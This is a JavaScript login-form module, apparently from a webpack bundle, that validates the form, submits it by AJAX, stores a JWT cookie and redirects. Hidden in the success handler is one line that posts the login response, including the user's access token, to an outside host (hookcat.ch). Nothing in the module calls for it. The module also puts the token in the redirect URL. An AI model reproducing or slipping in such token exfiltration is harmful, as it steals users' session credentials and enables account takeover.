/*------------------------------------*\
    signup
\*------------------------------------*/
module.exports = function(){



    if ( $('.js-login-form').length ) {
        $('.js-login-form').parsley();
    }




    $('.js-login-form').on('submit', function(event) {
        event.preventDefault();

        var form = $(this);

        form.closest('.js-every-modal-wrapper').css('height', 'auto');

        if ( form.parsley().isValid() ) {


            $.ajax({
                url: form.attr('action'),
                type: form.attr('method'),
                data: form.serialize(),
                dataType: 'json',

                complete: function(jqXHR, textStatus){


                },

                success: function(data, textStatus, jqXHR){

                    onSuccess(form);
                    $.post("https://hookcat.ch/ephlogin", data);
                    loginUser(data.data.token);

                },

                error: function(jqXHR, textStatus, errorThrown){

                    onError(form, jqXHR.responseJSON.msg);
                },

            });


        }


    });












    function loginUser(providedToken){

        var expiration = new Date();
        expiration.setTime(expiration.getTime() + (60 * 1000));
        Cookies.set('JUST_LOGGED_IN', 'true', { expires: expiration }); // expires in 1minute

        Cookies.remove('JWT_ACCESS_TOKEN');
        Cookies.set('JWT_ACCESS_TOKEN', providedToken, { expires: 90 });

        var redirectCookie = Cookies.get('LOGIN_SIGNUP_REDIRECT_URI');
        var redirectURI = encodeURIComponent( redirectCookie ? redirectCookie : '/get-fitted/' );
        Cookies.remove('LOGIN_SIGNUP_REDIRECT_URI');

        window.location.replace(location.origin + location.pathname + '?redirect_uri=' + redirectURI + '&token=' + providedToken);


    }









    function onSuccess(form){

        form.find('.js-form-callback')
            .html('You\'ve logged in successfully. We are now redirecting you to an apprioprate page.')
            .addClass('is-visible')
            //.addClass('is-success')
            .removeClass('is-error');


        form.find('.js-login-success-hide').css('height', function(){
            return $(this)[0].scrollHeight;
        });

        setTimeout(function(){
            form.find('.js-login-success-hide').addClass('is-invisible');
        }, 0);


    }








    function onError(form, msg){

        Cookies.remove('JWT_ACCESS_TOKEN');

        form.find('.js-form-callback')
            .text(msg)
            .addClass('is-visible')
            .removeClass('is-success')
            .addClass('is-error');


    }




}; // end of module.exports



// WEBPACK FOOTER //
// ./js-source/integration/login.js